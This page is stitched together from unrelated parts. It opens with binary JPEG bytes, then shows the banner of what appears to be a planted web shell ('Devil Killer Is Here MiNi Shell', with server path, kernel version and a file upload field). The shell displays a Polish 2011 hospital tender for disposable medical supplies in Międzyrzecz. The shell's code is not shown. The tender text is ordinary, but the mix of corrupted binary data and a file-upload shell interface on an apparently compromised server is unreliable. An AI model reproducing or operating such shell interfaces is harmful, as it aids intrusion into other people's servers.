JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110107/8353-N-2011.html

<p class="kh_header"><b>Międzyrzecz: Dostawa medycznych środków jednorazowego użytku  - strzykawek, igieł, folii chirurgicznych, obłożeń operacyjnych, aparatów do przetoczeń.</b><br>
<b>Numer ogłoszenia: 8353 - 2011; data zamieszczenia: 07.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Konstytucji 3 Maja 35, 66-300 Międzyrzecz, woj. lubuskie, tel. 095 7428298.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa medycznych środków jednorazowego użytku  - strzykawek, igieł, folii chirurgicznych, obłożeń operacyjnych, aparatów do przetoczeń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa dla potrzeb Szpitala Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Międzyrzeczu środków medycznych jednorazowego użytku  określonych  według grup asortymentowo - cenowych zgrupowanych w pakietach od nr 1 do nr 24 - stanowiących załącznik nr 3 SIWZ.
Nr 1 cewniki, dreny myjki, opaski identyfikacyjne, strzykawki tuberkulinowe, nr 2 strzykawki, igły przedłużacze do pomp, przyrządy do przetoczeń, nr 3 ,rękawice diagnostyczne 4 rękawice chirurgiczne , nr 5 pojemniki na odpady nr 6 wzierniki,osłonki na głowice, 7 cewniki,worki do zbiórki moczu, nr 8 zestawy porodowe,9 zestawy operacyjne 10 serwety ,folie chirurgiczne,  nr 11 papier do KTG, pokrowce,żel do UZG, nr 12 Aparaty do przygotowywania i pobierania leków ,z zastawką otwierającą drogę dla płynu tylko w momencie przyłączenia strzykawki z filtrem  przeciwbakteryjnym 
 nr 13 cewniki, dreny, nr 14 elektrody, nr 15 zestawy do wkłuć centralnych, aparaty do przetoczeń, filtry, igły do znieczuleń, nr 16 filtry, zestawy do punkcji, 17 wkłady workowe, łączniki do drenów,  18 szczotki jednorazowego użytku do mycia rąk, 19 maski usta-nos, worki ambu, 20 strzykawki, 21butelki, smoczki, 22 szczoteczki, zestawy do toalety jamy ustnej, 23 zestaw do przyskórnej tracheotomii,, 24 zestaw do punkcji jamy opłucnej.
Oferowany przez dostawcę w/w towar musi spełniać normy określone w Rejestrze Środków Farmaceutycznych i Materiałów Medycznych dopuszczonych do obrotu w Polsce - do potwierdzenia kopiami na życzenie Zamawiającego. Każdy produkt oznaczony CE.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.14.16.40-6, 33.14.16.42-2, 33.14.13.20-9, 33.14.13.10-6, 33.14.12.20-8, 18.42.43.00-0, 33.14.14.20-0, 33.15.78.00-3, 33.15.77.00-2, 33.68.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunki udziału w postępowaniu .

O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełniają następujące warunki :
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie,
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
są w sytuacji ekonomicznej i finansowej  umożliwiającej realizację zamówienia
Nie spełnienie chociażby jednego warunku, skutkować będzie odrzuceniem oferty.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne : 
Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunki udziału w postępowaniu .

O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełniają następujące warunki :
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie,
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
są w sytuacji ekonomicznej i finansowej  umożliwiającej realizację zamówienia
Nie spełnienie chociażby jednego warunku, skutkować będzie odrzuceniem oferty.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne : 
Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunki udziału w postępowaniu .

O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełniają następujące warunki :
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie,
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
są w sytuacji ekonomicznej i finansowej  umożliwiającej realizację zamówienia
Nie spełnienie chociażby jednego warunku, skutkować będzie odrzuceniem oferty.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne : 
Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunki udziału w postępowaniu .

O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełniają następujące warunki :
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie,
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
są w sytuacji ekonomicznej i finansowej  umożliwiającej realizację zamówienia
Nie spełnienie chociażby jednego warunku, skutkować będzie odrzuceniem oferty.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne : 
Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Warunki udziału w postępowaniu .

O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełniają następujące warunki :
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie,
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
są w sytuacji ekonomicznej i finansowej  umożliwiającej realizację zamówienia
Nie spełnienie chociażby jednego warunku, skutkować będzie odrzuceniem oferty.
2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne : 
Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wymagane:

-     formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
-	aktualne zaświadczenie właściwego naczelnika  urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-	dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych,
-	koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem,
-	oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 4
-	oświadczenie Oferenta, że zapoznał się z niniejszą specyfikacją i nie wnosi żadnych zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty   - załącznik nr 1
-	oświadczenie Oferenta   , że zapoznał się z projektem  umowy i nie wnosi uwag - załącznik nr 1 a .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Jakość - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.spzoz.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Międzyrzeczu
ul. Konstytucji  3 Maja 35
66 - 300 Międzyrzecz
Pokój Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2011 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Międzyrzeczu
ul. Konstytucji  3 Maja 35
66 - 300 Międzyrzecz
Sekretariat Szpitala.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	  Producent	Numer katalogowy	J.m	Cenajednostkowanetto	VAT%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1.	Cewniki do karmienia niemowląt-rozmiar4CH, 5CH, 6CH, 8CH			Szt				300	
2.	Zgłębniki żołądkowe -rozmiar 6-150szt.8-150szt.10-200szt.12-200szt.			Szt				700	
3.	Zgłębnik żołądkowy Nr.14,16,18,20 i  roz.40F			Szt				800	
4.	Strzykawka typu ŻANETA do podawania leków o pojemności 100ml			Szt				2000	
5.	Myjki do mycia pacjenta          ( rękawice) :- naturalne PH , nasycone środkiem myjącym oraz środkiem antybakteryjnym, wykonana z włókna 80 g / m2, rozmiar 16 cm x 20 cm x 1 cm w opakowaniu foliowym , oświadczenie producenta o możliwości używania myjki do mycia noworodków  I niemowlat			Szt				700	
6	Myjka do mycia pacjentów duża,  wykonana z włókniny, bez zawartości środka myjącego i dezynfekcyjnego 			szt				500	
7.	 Cewnik do podawania tlenu z końcówką donosową typu, ,Wąsy   w rozmiarze dla dzieci 			Szt				150.	
8.	Maski do podawania tlenu dla dorosłych			Szt				500	
9.	 Cewnik do podawania tlenu z końcówką donosową typu, ,Wąsy   w rozmiarze dla  dorosłych			Szt				2000	
10.	Dren ( przedłużacz) do podawania tlenu :-długości 2m.,pakowany pojedynczo, jednorazowego użytku			Szt				500	
11.	Maska do podawania tlenu do rurki tracheostomijnej			Szt				50	
12.	Maski do podawania tlenu noworodkowe i małych dzieci			Szt				150	
13.	 Zestaw do inhalacji                  ( nebulizacji dla  dzieci) 			Szt				500	
14.	Zestaw do inhalacji  (nebulizacji dla dorosłych)			Szt				1500	
15.	 Ratunkowa folia przeciwwstrząsowa-srebrno-złota,wym.160x210cm,			Szt				100	
16.	Opaska identyfikacyjna dla noworodków i niemowląt 			Szt				3000	
17	Opaska identyfikacyjna dla dorosłych 			Szt				6000	
18	Szpatułki laryngologiczne plastikowe, jednorazowe biologicznie czyste, pakowane pojedynczo 			szt 				2000.	
19	Szpatułki laryngologiczne drewniane, jednorazowe biologicznie czyste, pakowane pojedynczo			szt				500	
20	Kieliszki jednorazowego użytku , przezroczyste plastikowe , poj. 30 ml. Z trwałą podziałką mililitrową			szt				1500	
21	Pojnik z dzióbkiem 			szt				100	
22	 Golarka medyczna			szt				500szt.	
23	Opaska uciskowa staza			Szt				50	
24	 Kołnierz dla ratownictwa do stabilizacji odcinka szyjnego kręgosłupa, regulowany dla dorosłych i dla dzieci.Jednorazowy, w przedniej części otwory pozwalające na kontrolę AR na tętnicy szyjnej .Wykonany z materiału pozwalającego na wykonanie RM i RTG. Zapięcie na rzep			Szt				50	
25	 Worek na zwłoki			szt				500	
26	Cewniki do odsysania górnych dróg oddechowych z otworem centralnym i min. dwoma otworami bocznymi-rozmiar CH 6-20 			Szt				10000	
27.	Kaczka do moczu jednorazowawykonana z masy papierowej, całkowicie biodegradalnej			Szt				100	
28	Basen duży, głęboki, jednorazowywykonany z masy papierowej, całkowicie biodegradalnej			Szt				100	
29.	Miska nerkowata jednorazowawykonana z masy papierowej, całkowicie biodegradalnej			Szt				2000	
30.	Basen sanitarny płaski z pokrywąwykonany z plastiku, niełamliwy, z możliwością stosowania środków dezynfekcyjnych, oraz wysokiej temperatury do 120 stopni.C			Szt				50	
31.	Kaczka męska z przykrywką  wykonany z niełamliwego plastiku,  z możliwością stosowania środków dezynfekcyjnych, oraz wysokiej temperatury do 120 stopni.C			Szt				50	
32	Szyna Zimmera 			Szt				100	
33	Skalpel jednorazowy nr. 10,11,21,23			szt				100	
34	Ostrza chirurgiczne rozmiar 10,10A,11,12,13,15,18,20,21,23,:			szt				3000	
35	Okulary ochronne			Szt				50	
36.	Dren kateter do odsysania z ran długości 70 cm, jałowy, nietoksyczny, przezroczysty,  wykonany z medycznego PCV, z perforacją -15 cm, ze wskazaniem radiacyjnym, pakowany pojedynczo, czytelnie oznakowany			Szt				1000	
37	Pojemnik do zestawu ssącego Redon.			Szt				1000	
38	Medyczny termometr cieczowy ze szkła bez rtęci - do pomiaru temperatury ciała			szt				40	
39	Pisak wodoodporny do pisania na szkle i tworzywach sztucznych, w kolorach: białym, czarnym i niebieskim			szt				200	
40	Wziernik do uszu, jednorazowy, Reister do otoskopów Pen - scope; wielkość 2,5 mm.							500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.14.16.40-8, 33.14.16.42-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Jakość - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Producent	Numerkatalogowy	J.m	Cenajednostkowanetto	Vat%	Cenajednostkowabrutto	Zamawianailośćszacunkowa	Wartość bruttozamówienia
1	Igła jednorazowego użytku 0,5x25mm 			Op100 szt				20	
2.	Igła jednorazowego użytku0,6x25mm 			Op 100 szt				50	
3.	Igła jednorazowego użytku0,7x40mm 			Op 100 szt				200	
4.	Igła jednorazowego użytku0,8x40mm 			0p 100 szt				400	
5.	Igła jednorazowego użytku 0,9x40mm 			Op 100 szt				500	
6.	Igła jednorazowego użytku 1,0x40mm 			0p 100szt				200	
7.	Igła jednorazowego użytku1,2x40mm 			0p 100 szt				600	
8.	 Igły doszpikowe dla: niemowląt, dzieci i dorosłych			Szt				30	
9.	Strzykawki jednorazowe 50ml/60 ml ciemne bursztynowe			Szt`				2000.	
10.	Strzykawki jednorazowe 50 ml/60ml. 			Szt				6000	
11.     	Przedłużacz do pomp infuzyjnych bursztynowy			Szt				2000	
12.	Przedłużacz do pomp infuzyjnych			Szt				2000.	
13.	Przyrząd do przetaczania płynów infuzyjnych 			Szt				40.000.	
14.	Przyrząd do przet. krwi			Szt				5000	
15.	Strzykawki jednorazowe 2ml.			Szt				8000	
16	Strzykawki jednorazowe 5ml			Szt				60.000	
17	Strzykawki jednorazowe 10ml.			Szt				50.000.	
18	Strzykawki jednorazowe 20ml. 			Szt				30.000	
19.	Kaniula tętnicza z zaworem odcinającym 			Szt				150	
20.	Kaniula dożylna 26 G (0,6)			szt				3000	
21.	Kaniula dożylna 24 G (0,7)			Szt				3000	
22.	Kaniula do wlewów dożylnych typu,, MOTYLEK			szt				500 	
23.	Kaniula dożylna 17G (1,4x45 mm)			Szt				1500	
24.	Kaniula dożylna 18G (1,2x45mm)			Szt				5000	
